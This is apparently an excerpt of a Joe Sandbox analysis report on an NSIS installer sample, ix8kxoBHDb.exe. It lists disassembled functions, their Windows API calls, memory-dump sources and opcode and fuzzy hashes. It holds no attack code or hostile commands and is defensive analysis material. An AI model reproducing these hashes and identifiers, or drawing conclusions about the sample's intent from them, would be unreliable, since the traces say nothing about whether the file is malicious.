                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWidelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp$C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll
                                                  • API String ID: 3109718747-937194633
                                                  • Opcode ID: 43ad42b55247376bb2ab46c00e326ba01da809c0ffe6f982d396e576083aa9ce
                                                  • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                  • Opcode Fuzzy Hash: 43ad42b55247376bb2ab46c00e326ba01da809c0ffe6f982d396e576083aa9ce
                                                  • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true
                                                  • Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: FreeGlobal
                                                  • String ID:
                                                  • API String ID: 2979337801-0
                                                  • Opcode ID: a33ce1b045185d14298839372fbc6977dad1003ff80bcc87838890f2a16fa0a6
                                                  • Instruction ID: f7106eb37a8759176d4b4d20e8472a124f67e82fd43be1f6809be1d09d560cde
                                                  • Opcode Fuzzy Hash: a33ce1b045185d14298839372fbc6977dad1003ff80bcc87838890f2a16fa0a6
                                                  • Instruction Fuzzy Hash: B851067ED001599FDB0E9FA485C07AE7EBAEBC4350F048279D426B3285F6709E8187A1
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 73B024D6
                                                    • Part of subcall function 73B0122C: lstrcpynW.KERNEL32(00000000,?,73B012DF,00000019,73B011BE,-000000A0), ref: 73B0123C
                                                  • GlobalAlloc.KERNEL32(00000040), ref: 73B0245C
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73B02477
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true
                                                  • Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                  • String ID:
                                                  • API String ID: 4216380887-0
                                                  • Opcode ID: 5d2cb61744ab9667ec3595d4674f7ce4232c9501b894f5290af06a68be2987cc
                                                  • Instruction ID: a06de46e6b8e1565a5453e07d338a0d43adefb494062f7e6fa84deea3ccb60a5
                                                  • Opcode Fuzzy Hash: 5d2cb61744ab9667ec3595d4674f7ce4232c9501b894f5290af06a68be2987cc
                                                  • Instruction Fuzzy Hash: D74181B1408309EFE725DF61D984B2A7FB8EB98314F10453EE54A8B991FB70A548CB61
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73B021EC,?,00000808), ref: 73B01635
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,73B021EC,?,00000808), ref: 73B0163C
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73B021EC,?,00000808), ref: 73B01650
                                                  • GetProcAddress.KERNEL32(73B021EC,00000000), ref: 73B01657
                                                  • GlobalFree.KERNEL32(00000000), ref: 73B01660
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true
                                                  • Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                  • String ID:
                                                  • API String ID: 1148316912-0
                                                  • Opcode ID: d2bc816708d0ca30a619b8f3c8ab74436dc37ffa4a4e3d0b3b22b0887d5ce17e
                                                  • Instruction ID: 620dcab6d714dedf128c2f4ff1cc0e5ef040a1341b2f25b8414150222d6809aa
                                                  • Opcode Fuzzy Hash: d2bc816708d0ca30a619b8f3c8ab74436dc37ffa4a4e3d0b3b22b0887d5ce17e
                                                  • Instruction Fuzzy Hash: 7DF012731061387BD63126A78E4CD9B7E9CDF9B2F9B110211F71CA21A095614C01DBF1
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401D63
                                                  • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                  • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                  • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                  • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                  • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                  • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                  • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-1881609536
                                                  • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                  • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                  • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                  • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                  APIs
                                                    • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                    • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,756F2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405D76
                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                  • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,756F2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405E1E
                                                  • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,756F2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,756F2EE0), ref: 00405E2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: 0_B
                                                  • API String ID: 3248276644-2128305573
                                                  • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                  • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                  • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                  • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 004053F3
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                    • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                  • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                  • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                  • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                  APIs
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                  • CloseHandle.KERNEL32(?), ref: 00405A07
                                                  Strings
                                                  • Error launching installer, xrefs: 004059E4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                  • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                  • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                  • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,756F2EE0,00403A1A,756F3420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                  • GlobalFree.KERNEL32(?), ref: 00403A64
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-1881609536
                                                  • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                  • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                  • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                  • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ix8kxoBHDb.exe,C:\Users\user\Desktop\ix8kxoBHDb.exe,80000000,00000003), ref: 00405D0F
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ix8kxoBHDb.exe,C:\Users\user\Desktop\ix8kxoBHDb.exe,80000000,00000003), ref: 00405D1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-4267323751
                                                  • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                  • Instruction ID: 65148869c9b5617484fe42b3676c909fd92059a2a8224d2a454660f99163d925
                                                  • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                  • Instruction Fuzzy Hash: A3D0A7B7410920EAD3126B04DC04D9F73ACEF51300B46843BE840A7171D7785CD18BEC
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 73B0116A
                                                  • GlobalFree.KERNEL32(00000000), ref: 73B011C7
                                                  • GlobalFree.KERNEL32(00000000), ref: 73B011D9
                                                  • GlobalFree.KERNEL32(?), ref: 73B01203
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true
                                                  • Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: a5338ffd82d24a5ec7347f6daccffa31fec6e5f3fbf12c52d9e140c38dc3f7f0
                                                  • Instruction ID: 132b35488d811e11401d52fefadda27c1487afb43c7dff7b5382fec132868727
                                                  • Opcode Fuzzy Hash: a5338ffd82d24a5ec7347f6daccffa31fec6e5f3fbf12c52d9e140c38dc3f7f0
                                                  • Instruction Fuzzy Hash: 0331B4FAA042059FE7189F66CB84B297FFCFB94314B14413AE94AD7A54F734D8018B60
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                  • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
